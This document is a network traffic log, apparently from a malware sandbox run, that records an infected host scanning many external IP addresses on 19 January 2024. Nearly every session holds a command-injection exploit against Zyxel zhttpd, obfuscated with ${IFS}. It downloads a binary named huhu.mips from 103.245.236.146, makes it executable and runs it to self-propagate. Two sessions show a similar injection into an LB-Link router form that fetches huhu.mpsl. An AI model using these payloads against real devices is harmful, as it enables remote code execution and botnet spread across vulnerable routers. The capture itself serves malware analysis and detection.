                                      Jan 19, 2024 17:29:47.075160027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8079192.168.2.1441968169.92.155.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075196981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8080192.168.2.1458446151.246.196.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075234890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8081192.168.2.1447610134.146.100.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075288057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8082192.168.2.145091082.239.189.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075314045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8083192.168.2.1437726183.128.83.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075356007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8084192.168.2.1455284210.3.224.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075396061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8085192.168.2.144953076.196.17.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075423956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8086192.168.2.1445858140.123.38.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075464964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8087192.168.2.1434630186.241.239.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075512886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8088192.168.2.1458036102.153.228.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075534105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8089192.168.2.1441424211.217.168.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075592995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8090192.168.2.1438972198.201.160.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.078522921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8091192.168.2.1435684100.132.53.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.078552008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8092192.168.2.1436080117.234.172.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.078593969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8093192.168.2.143571295.53.130.1518080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.191917896 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:47.448715925 CET533INHTTP/1.1 404 Not Found
                                      Vary: Accept-Encoding
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Type: text/html
                                      X-Content-Type-Options: nosniff
                                      Date: Fri, 19 Jan 2024 19:29:18 GMT
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      X-XSS-Protection: 1; mode=block
                                      Connection: Keep-Alive
                                      Accept-Ranges: bytes
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8094192.168.2.145590249.232.165.1658080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.452514887 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:47.796729088 CET929INHTTP/1.1 400
                                      Content-Type: text/html;charset=utf-8
                                      Content-Language: en
                                      Content-Length: 762
                                      Date: Fri, 19 Jan 2024 16:29:47 GMT
                                      Connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 37 32 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><hr class="line" /><h3>Apache Tomcat/9.0.72</h3></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8095192.168.2.1443616156.205.114.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087248087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8096192.168.2.144551488.210.119.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087285042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8097192.168.2.14531945.76.44.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087311029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8098192.168.2.144895069.181.36.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087371111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8099192.168.2.1450996145.191.48.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087415934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8100192.168.2.146033645.228.243.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087454081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8101192.168.2.145211820.217.173.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087512016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8102192.168.2.14371241.133.170.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087551117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8103192.168.2.1459524150.23.93.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087609053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8104192.168.2.144700436.79.5.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087651968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8105192.168.2.1453572132.252.195.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087676048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8106192.168.2.1448038173.153.241.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087711096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8107192.168.2.1456514132.58.20.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087764978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8108192.168.2.14487169.158.198.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087796926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8109192.168.2.143590423.178.163.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087852001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8110192.168.2.1443966180.205.237.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087882996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8111192.168.2.1434752218.17.110.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087939024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8112192.168.2.144968246.123.105.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.087984085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8113192.168.2.1453406223.57.39.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088011026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8114192.168.2.143454084.38.186.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088054895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8115192.168.2.144463420.8.3.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088078976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8116192.168.2.1440790211.65.45.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088150024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8117192.168.2.1447970111.73.98.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088192940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8118192.168.2.1433292203.23.147.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088243008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8119192.168.2.145042832.181.105.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088289022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8120192.168.2.1434526209.70.252.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088329077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8121192.168.2.146048072.21.95.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088367939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8122192.168.2.1459970161.144.118.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088396072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8123192.168.2.1455144170.246.4.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088439941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8124192.168.2.1456956198.174.107.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088493109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8125192.168.2.1446290110.104.142.138443
                                      TimestampBytes transferredDirectionData
